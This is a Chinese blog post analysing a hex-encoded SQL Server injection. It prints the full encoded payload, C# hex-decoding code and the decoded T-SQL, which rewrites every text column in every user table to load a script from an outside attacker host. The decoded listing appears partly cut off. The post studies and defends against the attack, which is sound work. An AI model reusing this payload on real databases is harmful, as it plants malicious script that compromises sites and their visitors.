也想出现在这里? 联系我们

SQL Hex Injection 十六进制注入解决方案

作者 : 小编 本文共4291个字,预计阅读时间需要11分钟 发布时间: 2021-06-23 共4.29K人阅读
也想出现在这里? 联系我们

今天朋友遇到一个问题,他的sql server 数据库被执行了一条语句dEcLaRe @s vArChAr(8000) sEt @s=0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b27273c2f7469746c653e223e3c736372697074207372633d687474703a2f2f2536312532452537302537302536442536442536462536462532452536332536453e3c2f7363726970743e3c212d2d27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f52 eXeC(@s)–从0x可以看出这是一段十六进制编码的sql语句于是想到将其解码:对于十六进制字符串编码和解码的C# 方法如下:

复制代码

代码如下:

/// /// 从字符串转换到16进制表示的字符串 /// /// /// 编码,如\”utf-8\”,\”gb2312\” /// 是否每字符用逗号分隔 /// public static string ToHex(string s, string charset, bool fenge) { if ((s.Length % 2) != 0) { s += \” \”;//空格 //throw new ArgumentException(\”s is not valid chinese string!\”); } System.Text.Encoding chs = System.Text.Encoding.GetEncoding(charset); byte[] bytes = chs.GetBytes(s); string str = \”\”; for (int i = 0; i < bytes.Length; i++) { str += string.Format(\”{0:X}\”, bytes[i]); if (fenge && (i != bytes.Length – 1)) { str += string.Format(\”{0}\”, \”,\”); } } return str.ToLower(); }</p>
<p> /// /// 从16进制转换成utf编码的字符串 /// /// /// 编码,如\”utf-8\”,\”gb2312\” /// public static string UnHex(string hex, string charset) { if (hex == null) throw new ArgumentNullException(\”hex\”); hex = hex.Replace(\”,\”, \”\”); hex = hex.Replace(\”\\n\”, \”\”); hex = hex.Replace(\”\\\\\”, \”\”); hex = hex.Replace(\” \”, \”\”); if (hex.Length % 2 != 0) { hex += \”20\”;//空格 throw new ArgumentException(\”hex is not a valid number!\”, \”hex\”); } // 需要将 hex 转换成 byte 数组。 byte[] bytes = new byte[hex.Length / 2]; for (int i = 0; i < bytes.Length; i++) { try { // 每两个字符是一个 byte。 bytes[i] = byte.Parse(hex.Substring(i * 2, 2), System.Globalization.NumberStyles.HexNumber); } catch { // Rethrow an exception with custom message. throw new ArgumentException(\”hex is not a valid hex number!\”, \”hex\”); } } System.Text.Encoding chs = System.Text.Encoding.GetEncoding(charset);</p>
<p> return chs.GetString(bytes); }

于是对这段代码进行解码:

复制代码

代码如下:

private static void TestHexStringDecode() { string oldSql = \”6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b27273c2f7469746c653e223e3c736372697074207372633d687474703a2f2f2536312532452537302537302536442536442536462536462532452536332536453e3c2f7363726970743e3c212d2d27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f52\”; Console.Write(System.Web.HttpUtility.UrlDecode( UnHex(oldSql, \”utf-8\”).ToLower())); }

这样它的原型就现出来了

复制代码

代码如下:

declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=\’u\’ and(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open table_cursor fetchnext from table_cursor into @t,@c while(@@fetch_status=0) begin exec(\’update [\’@t \’] set [\’ @c \’]=rtrim(convert(varchar,[\’ @c \’])) \’\’\”> ose table_cursor deallocate table_cursor

进行注入的人的网址就是a.ppmmoo.cn大家平时应该多注意这种注入, 可以通过控制对数据库的权限来避免上面这段代码的注入,据朋友介绍此人是在光纤的电脑上注入的,估计用肉鸡,或者服务器~~~另外 http://home2.paulschou.net/tools/xlate/ 这个网址可以对Hex编码的字符串进行解码

1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » SQL Hex Injection 十六进制注入解决方案

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html

发表评论

Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
开通VIP 享更多特权,建议使用QQ登录